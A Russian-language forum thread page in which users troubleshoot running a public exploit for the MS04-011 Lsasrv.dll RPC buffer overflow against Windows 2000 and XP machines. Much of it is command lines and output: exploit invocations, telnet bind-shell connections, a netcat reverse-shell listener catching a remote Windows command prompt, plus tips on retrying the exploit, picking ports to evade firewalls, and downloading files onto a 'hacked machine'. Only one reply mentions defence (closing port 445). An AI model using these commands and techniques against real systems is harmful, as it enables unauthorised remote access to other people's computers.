Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 5 6 ... 19 След.
RSS
MS04011 Lsasrv.dll RPC buffer overflow remote exploit (PoC) with Un...
 
Так еще вопрос насчет телнета....нашел машыну...но когда конектюсь через телнет  пишет

Подключение к хх.хх.хх.хх...Не удалось открыть подключение к этому узлу на порт 1234

Подключение не установлено так как конечный компютер отверг запрос на подключение
 
Как насчет ников?? А то ответ кроме как IP Logged некому послать  [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
 
откомпилил ввожу в командной строке адрес к *.ехе і айпишник с портом пишет Hello World и все  

так ктото скажет в чем проблема почему не так компілит???
 
мда ..
 
Млин.......ну не конекится через телнет.......епт....что делать? =)
 
Простите, что я не просветленный, но пишет следующее

E:\downloads\new>hod 1 192.168.133.40 1234 192.168.133.36
MS04011 Lsasrv.dll RPC buffer overflow remote exploit 0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.133.40: OS: Win2k Professional    [universal] netrap.dll

[*] Connecting to 192.168.133.40:445 ... OK
[*] Attacking ... OK

E:\downloads\new>telnet 192.168.133.40 1234
Подключение к 192.168.133.40...Не удается подключиться к узлу на порт 1234 : Сбой подключения

E:\downloads\new>
 
Послушай, W скачай готовый exe и хватит тебе париться с компилятором  [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
 
U kogo ne rabotaet:

Esli to4no uvereni 4to eto ta OS i tot target, to :
1. poprobovat' neskol'ko raz smenit' port binda.
2. porti do 1028 zelatel'no ne brat'.
3. poprobovat' NETCAT.
4. mozno poprobovat' reverse shell.
4. Esli i na etot raz ne srabotaet, to zastrelit'sy.

A tak exploit super... shas k nemu scaner prikrutit' (mozno daze ot Kahta vzyt') i vse! ~~~~KaHt3~~~~
 
Цитата
geney пишет:
2Olegnet
какой проект выбирать?
создавать новый =)

>после вех "Ок" telnet не конектиться к порту ? вчем причина
номер порта указывай > 1024
повтори операцию еще 2-3 раза, эксплойт иногда не с первого раза срабатывает, как видишь по скриншоту.
 
Цитата
Strij пишет:
Чой-то не работает. Может, чего напутал?

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.1.54: OS: Win2k Professional    [universal] netrap.dll
[*] Connecting to 192.168.1.54:445 ... OK
[*] Attacking ... OK

F:\>telnet 192.168.1.54 3333
Подключение к 192.168.1.54...Не удалось открыть подключение к этому узлу, на порт 3333: Сбой подключения
Говорю же, позапускай сплойт еще пару раз, обычно помогает.
 
4 YK -> зачем 192.168.133.36 .. можно обойтись
E:\downloads\new>hod 1 192.168.133.40 1234
потом или teln'ом или netcat'ом конектся к 192.168.133.40 1234
Если не коннектит то:
1. Таргет не тот
2. Порт фильтрует фаерволл
3. На remote machine стоит заплатка
4. Ещё что нибудь...
 
2 > [SpDOMINANT]
да просто, смотри :
<target> <victim IP> <bindport> [connectback IP] [options]
target = ось
victim IP = дырявая тачка
<bindport> = номер порта
[connectback IP] = твой айпи

варианты эксплуатации:
1)если ты не указываешь [connectback IP], то после эксплуатации коннктишься на bindport дырявой тачки
2)если ты указываешь [connectback IP], то предварительно ставишь неткат слушать <bindport> (и к тебе на <bindport> дропается шел)

Пример 1:
=======================================
С:\>HOD-ms04011-lsasrv-expl.exe 2 10.0.ххх.ххх 3333

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 10.0.ххх.ххх: OS: Win2k Advanced Server [SP4]       netrap.dll
[*] Connecting to 10.0.ххх.ххх:445 ... OK
[*] Attacking ... OK

c:\telnet 10.0.xxx.xxx 3333

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

E:\WINNT\system32>


Пример 2:
=======================================
(на своей машине)
С:\>nc -l -n -vv -p 3333
listening on [any] 3333 ...

С:\>HOD-ms04011-lsasrv-expl.exe 2 10.0.ххх.ххх 3333 10.0.yyy.yyy

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 10.0.ххх.ххх: OS: Win2k Advanced Server [SP4]       netrap.dll
[*] Connecting to 10.0.25.ххх:ххх:445 ... OK
[*] Attacking ... OK

в окне в nc:
H:\>nc -l -n -vv -p 3333
listening on [any] 3333 ...
connect to [10.0.yyy.yyy] from (UNKNOWN) [10.0.xxx.xxx] 2738
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

E:\WINNT\system32>


вот собственно и всё ...

Люди, кто умееет программировать и кому не жалко своего времени а так же жаба не задушит потом делиться ... добишите, пожалуйста, код, чтобы можно было указывать еще изходящий порт для бэк шела =)
 
Цитата
Don Perenion пишет:
Coonecting...
Sorry, cannot connect...
Чел в инете, пингуется итд...
Может твой провайдер трафик режет, может фаерволл, установленный на target'е тебя обламывает.
 
Цитата
Гость пишет:
Народ как правильно защитится помимо заплаты!!
xp sp1 Agnitium outpost!!! Что прикрыть? Порт может какой действие, службу?
закрыть нужно файволлом 445 порт
 
Don Perenion написал:
Coonecting...
Sorry, cannot connect...
Чел в инете, пингуется итд...


-----------------------------------------------

попробуй shell_back_connect на порт 80
 
Ребята,а как через телнет файлы качать?
 
Ребята,а как через телнет файлы качать?

--------------------------------------

скочай tftp server.....или ftp server а потом подрубис к себе со/взломанной тачки
 
Блин а у меня всё коннектится , всё ок ...только вот не видно что я пишу =((
 
YK

Послушай, W скачай готовый exe и хватит тебе париться с компилятором


нет дело принципа  [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG] я уже не первый експолит который публикуются, хочу откомпилировать и „почему-то” не получается....

етот хотел компилить в Microsoft Visual Studio .NET 2003
 
win2000 :)
Страницы: Пред. 1 2 3 4 5 6 ... 19 След.
Читают тему